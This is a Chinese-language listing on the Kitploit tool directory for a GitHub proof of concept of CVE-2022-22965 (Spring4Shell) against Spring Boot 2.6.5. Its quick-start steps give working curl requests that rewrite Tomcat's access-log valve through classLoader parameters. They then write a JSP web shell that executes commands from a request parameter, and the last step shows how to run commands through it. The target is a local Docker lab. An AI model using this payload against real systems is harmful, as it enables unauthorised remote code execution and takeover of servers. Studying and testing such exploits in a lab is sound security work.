Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
SSE4-CVE-2022-22965 — CVE-2022-22965 概念验证 | Kitploit
工具/GitHubGitHub/clemoregan/sse4-cve-2022-22965
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubclemoregan/sse4-cve-2022-22965

SSE4-CVE-2022-22965

CVE-2022-22965 概念验证

查看仓库
113年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Spring Boot CVE-2022-22965

基于 Spring Boot 2.6.5 的 CVE-2022-22965 Docker 概念验证(PoC)

快速开始

  1. 运行 docker compose up --build 构建并启动易受攻击的应用。
  2. 运行 curl -H "Accept: text/html;" "http://localhost:8080/demo/sample?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7b%63%6f%64%65%7d%69&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=" 以修改 Tomcat 配置阀门。
  3. 运行 curl -H "Accept: text/html;" -H "code: <% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter(String.valueOf(1337))).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1) { out.println(new String(b)); } %>" "http://localhost:8080/demo/x" 创建 Web shell。
  4. 打开浏览器并访问 http://localhost:8080/shell.jsp?1337=id 开始执行命令。
下载工具